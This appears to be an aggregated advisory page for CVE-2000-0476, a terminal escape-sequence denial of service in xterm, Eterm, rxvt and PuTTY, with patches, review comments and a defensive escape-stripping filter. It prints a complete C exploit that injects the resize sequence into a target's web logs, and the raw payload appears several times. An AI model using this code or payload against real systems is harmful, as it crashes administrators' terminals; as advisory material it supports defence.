CVE-2000-0476
CVSS 5.0
Published: 2000-06-01 00:00:00
Revised: 2008-09-10 15:04:44
NMCOES    

[Original] xterm, Eterm, and rxvt allow an attacker to cause a denial of service by embedding certain escape characters which force the window to be resized.


[CNNVD] Multiple Vendor xterm (and derivatives) Denial of Service Vulnerability (CNNVD-200006-004)

xterm, Eterm and rxvt contain a vulnerability: an attacker can cause a denial of service by embedding escape characters that force the window to be resized.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:xfree86_project:x11r6:3.3.3
cpe:/a:xfree86_project:x11r6:4.0
cpe:/a:putty:putty:0.48
cpe:/a:michael_jennings:eterm:0.8.10
cpe:/a:rxvt:rxvt:2.6.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0476
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0476
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-004
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1298
(VENDOR_ADVISORY)  BID  1298
http://archives.neohapsis.com/archives/bugtraq/2000-05/0409.html
(VENDOR_ADVISORY)  BUGTRAQ  20000601 [rootshell.com] Xterm DoS Attack
http://archives.neohapsis.com/archives/bugtraq/2000-05/0420.html
(UNKNOWN)  BUGTRAQ  20000601 [rootshell.com] Xterm DoS Attack

- Vulnerability information

Multiple Vendor xterm (and derivatives) Denial of Service Vulnerability
Medium  Other
2000-06-01 00:00:00 2005-10-20 00:00:00
Remote
xterm, Eterm and rxvt contain a vulnerability: an attacker can cause a denial of service by embedding escape characters that force the window to be resized.

- Advisories and patches

        Michael Jennings released the following patches for Eterm:
        Index: src/command.c
        ===================================================================
        RCS file: /cvs/enlightenment/Eterm/src/command.c,v
        retrieving revision 1.1.1.1.2.7
        diff -u -r1.1.1.1.2.7 command.c
        --- src/command.c 1999/11/02 16:34:35 1.1.1.1.2.7
        +++ src/command.c 2000/06/02 02:06:56
        @@ -4694,6 +4694,9 @@
         return; /* Make sure there are 2 args left */
         y = args[++i];
         x = args[++i];
        + if (x > scr->width || y > scr->height) {
        + return;
        + }
         XResizeWindow(Xdisplay, TermWin.parent, x, y);
         break;
         case 5:
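Review bot: the new `if (x > scr->width || y > scr->height)` check only bounds x and y from above; a zero-sized request still reaches `XResizeWindow(Xdisplay, TermWin.parent, x, y)`, and XResizeWindow does not accept zero dimensions, so a lower bound (`x > 0 && y > 0`) is needed as well. This hunk also rejects an oversize request outright, whereas the term.c patch for the same case clamps it; pick one behaviour for both branches and say why in a comment.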
        @@ -4713,6 +4716,9 @@
         return; /* Make sure there are 2 args left */
         y = args[++i];
         x = args[++i];
        + if (x > (scr->width / TermWin.fwidth) || y > (scr->height / TermWin.fheight)) {
        + return;
        + }
         XResizeWindow(Xdisplay, TermWin.parent,
         Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_visible()? scrollbar_total_width() : 0),
         Height2Pixel(y) + 2 * TermWin.internalBorder + (menubar_visible()? menuBar_TotalHeight() : 0));
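Review bot: the bound `x > (scr->width / TermWin.fwidth) || y > (scr->height / TermWin.fheight)` counts character cells only, while the size actually passed to XResizeWindow adds `2 * TermWin.internalBorder`, `scrollbar_total_width()` and `menuBar_TotalHeight()`, so a request just inside the limit still yields a window larger than the screen. Derive the limit from the same expression used in the XResizeWindow call, and make sure TermWin.fwidth and TermWin.fheight cannot be zero here, since both are used as divisors.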
        (second patch, attached as Eterm-0.9-DoS.patch)
        Index: src/term.c
        ===================================================================
        RCS file: /cvs/enlightenment/Eterm/src/term.c,v
        retrieving revision 1.33
        diff -u -r1.33 term.c
        --- src/term.c 2000/01/17 21:29:27 1.33
        +++ src/term.c 2000/06/02 02:06:44
        @@ -1232,6 +1232,8 @@
         return; /* Make sure there are 2 args left */
         y = args[++i];
         x = args[++i];
        + UPPER_BOUND(y, scr->height);
        + UPPER_BOUND(x, scr->width);
         XResizeWindow(Xdisplay, TermWin.parent, x, y);
         #ifdef USE_XIM
         xim_set_status_position();
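Review bot: UPPER_BOUND is used here without its definition appearing in the diff; include it (or a comment stating that it clamps the variable in place rather than only comparing it) so a reviewer can confirm that the clamped x and y are what XResizeWindow receives. As in the command.c patch, only an upper bound is applied, so a zero-sized request still reaches XResizeWindow. Clamping removes the crash but any untrusted text can still resize the terminal to an in-range size; a configuration switch to ignore window-manipulation sequences entirely would be the more complete fix.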
        @@ -1254,6 +1256,8 @@
         return; /* Make sure there are 2 args left */
         y = args[++i];
         x = args[++i];
        + UPPER_BOUND(y, scr->height / TermWin.fheight);
        + UPPER_BOUND(x, scr->width / TermWin.fwidth);
         XResizeWindow(Xdisplay, TermWin.parent,
         Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_is_visible()? scrollbar_trough_width() : 0),
         Height2Pixel(y) + 2 * TermWin.internalBorder);
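Review bot: clamping x to `scr->width / TermWin.fwidth` and y to `scr->height / TermWin.fheight` ignores the `2 * TermWin.internalBorder` and `scrollbar_trough_width()` terms added in the XResizeWindow call below, so the window can still exceed the screen by those pixels; compute the bound from the same expression. Note also that the two Eterm patches now diverge (command.c returns on an oversize request, term.c clamps it), which deserves a comment for whoever maintains both branches.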
        Simon Tatham PuTTY 0.48

- Vulnerability information (19984)

Eterm 0.8.10,rxvt 2.6.1,PuTTY 0.48,X11R6 3.3.3/4.0 Denial of Service (EDBID:19984)
multiple dos
2000-05-31 Verified
0 Kit Knox
N/A
source: http://www.securityfocus.com/bid/1298/info

xterm is a popular X11-based terminal emulator. If VT control-characters are displayed in the xterm, they can be interpreted and used to cause a denial of service attack against the client (and even the host running the client). What makes it possible for remote users to exploit this vulnerability is a situation like this:

An admin is tailing the HTTP access log

Attacker requests a URL with control characters in it

Admin's xterm crashes

This vulnerability also affects applications (such as other terminal emulators) derived from xterm code.

/*
 *
 * xterm Denial of Service Attack
 * (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
 *
 * Tested against: xterm (XFree86 3.3.3.1b(88b)  -- crashes
 *                 rxvt v2.6.1 -- consumes all available memory and then
 *                                crashes.
 *
 * Not vulnerable: KDE konsole 0.9.11
 *                 Secure CRT 3.0.x
 *
 *
 * By sending the VT control characters to resize a window it is possible
 * to cause an xterm to crash and in some cases consume all available
 * memory.
 *
 * This itself isn't much of a problem, except that remote users can inject
 * these control characters into your xterm numerous ways including :
 *
 * o Directories and filenames on a rogue FTP servers.
 * o Rogue banner messages on ftp, telnet, mud daemons.
 * o Log files (spoofed syslog messages, web server logs, ftp server logs)
 *
 * This sample exploit injects these control characters into a web get
 * request.  If an admin were to cat this log file, or happened to be doing
 * a "tail -f access_log" at the time of attack they would find their
 * xterm crash.
 *
 * Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character)
 * inside files, directories, etc will have the same effect as this code.
 *
 */

#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

int sock;

int
main (int argc, char *argv[])
{
  struct hostent *he;
  struct sockaddr_in sa;
  char buf[1024];
  char packet[1024];
  int i;

  fprintf(stderr, "[ http://www.rootshell.com/ ] - xterm DoS attack - 05/31/2000.\n\n");
  if (argc != 2)
    {
      fprintf (stderr, "usage: %s <host/ip>\n", argv[0]);
      return (-1);
    }

  sock = socket (AF_INET, SOCK_STREAM, 0);
  sa.sin_family = AF_INET;
  sa.sin_port = htons (80);
  he = gethostbyname (argv[1]);
  if (!he)
    {
      if ((sa.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
	return (-1);
    }
  else
    {
      bcopy (he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
    }
  if (connect (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0)
    {
      fprintf (stderr,
	       "Fatal Error: Can't connect to web server.\n");
      return (-1);
    }
  sprintf(packet, "GET /\033[4;65535;65535t HTTP/1.0\n\n");
  write (sock, packet, strlen(packet));
  close (sock);
  fprintf(stderr, "Done.\n");
}
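The delivery path described above is untrusted text (log lines, file names, banners) reaching an administrator's terminal, so the defensive counterpart is to neutralize escape sequences before anything is displayed. The filter below is an added example, not part of the original advisory or of any vendor code; the function name `strip_csi` and the sample access-log line are constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#define ESC 0x1b

/* Copy `in` to `out` (capacity `outlen`, always NUL-terminated) with every
 * CSI sequence (ESC '[' params... final byte) removed and any lone ESC dropped.
 * Returns how many removed sequences ended in 't' (xterm window manipulation). */
int strip_csi(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    int resize_cmds = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        unsigned char c = (unsigned char)in[i];
        if (c != ESC) {
            if (o + 1 < outlen)
                out[o++] = (char)c;
            continue;
        }
        if (in[i + 1] != '[')
            continue;                          /* lone ESC: drop it */
        /* Skip parameter (0x30-0x3F) and intermediate (0x20-0x2F) bytes. */
        size_t j = i + 2;
        while ((unsigned char)in[j] >= 0x20 && (unsigned char)in[j] <= 0x3F)
            j++;
        unsigned char f = (unsigned char)in[j];
        if (f == '\0')
            break;                             /* truncated sequence at end of input */
        if (f >= 0x40 && f <= 0x7E) {          /* valid final byte: consume it */
            if (f == 't') resize_cmds++;
            i = j;                             /* loop's i++ steps past it */
        } else {
            i = j - 1;                         /* malformed: rescan this byte as text */
        }
    }
    if (outlen > 0)
        out[o] = '\0';
    return resize_cmds;
}

int main(void)
{
    /* Constructed sample: an access-log line carrying the advisory's sequence. */
    const char *line = "10.0.0.5 - - \"GET /\033[4;65535;65535t HTTP/1.0\" 404";
    char clean[256];
    int n = strip_csi(line, clean, sizeof clean);
    printf("dropped %d resize command(s): %s\n", n, clean);
    return 0;
}
```

Piping `tail -f access_log` through such a filter (or through `cat -v`) keeps the resize sequence from ever being interpreted by the terminal, which is the mitigation the advisory's log-tailing scenario calls for.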


- Vulnerability information

83441
rxvt Embedded Escape Character Handling DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Unknown

- Vulnerability description

rxvt contains a flaw that may allow a denial of service. The issue is triggered when a remote attacker is able to resize the terminal window via escape character sequences, which will cause a denial of service. This flaw will result in loss of availability for the xterm.

- Timeline

2000-06-02 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Vendor xterm (and derivatives) Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 1298
Yes No
2000-06-01 12:00:00 2009-07-11 02:56:00
First posted to BugTraq by Kit Knox <kit@rootshell.com> on May 31, 2000.

- Affected program versions

XFree86 X11R6 4.0
XFree86 X11R6 3.3.3
Simon Tatham PuTTY 0.48
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
rxvt rxvt 2.6.1
- Immunix Immunix OS 7.0 beta
- Immunix Immunix OS 7.0
- Immunix Immunix OS 6.2
Michael Jennings Eterm 0.8.10

- Unaffected program versions

VanDyke SecureCRT 3.0
Sun Solaris 8_sparc
Sun OpenWindows 3.0
+ Sun SunOS 4.1.1
Simon Tatham PuTTY 0.49
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
HP HP-UX 11.0 4

- Vulnerability discussion

The BugTraq discussion text is identical to the advisory description reproduced under the EDB entry (19984) above.

- Exploit

It was reported on BugTraq (June 4, 2000 by Sebastian Hans <gone@graffiti.net>) that substituting 65536 for 65535 may be necessary with some configurations: sprintf(packet, "GET /\033[4;65535;65535t HTTP/1.0\n\n");

- Solution

Michael Jennings released patches for Eterm; they are the same two diffs (command.c and term.c) reproduced in full under the CNNVD record's advisories-and-patches section earlier on this page.


Simon Tatham PuTTY 0.48

- References
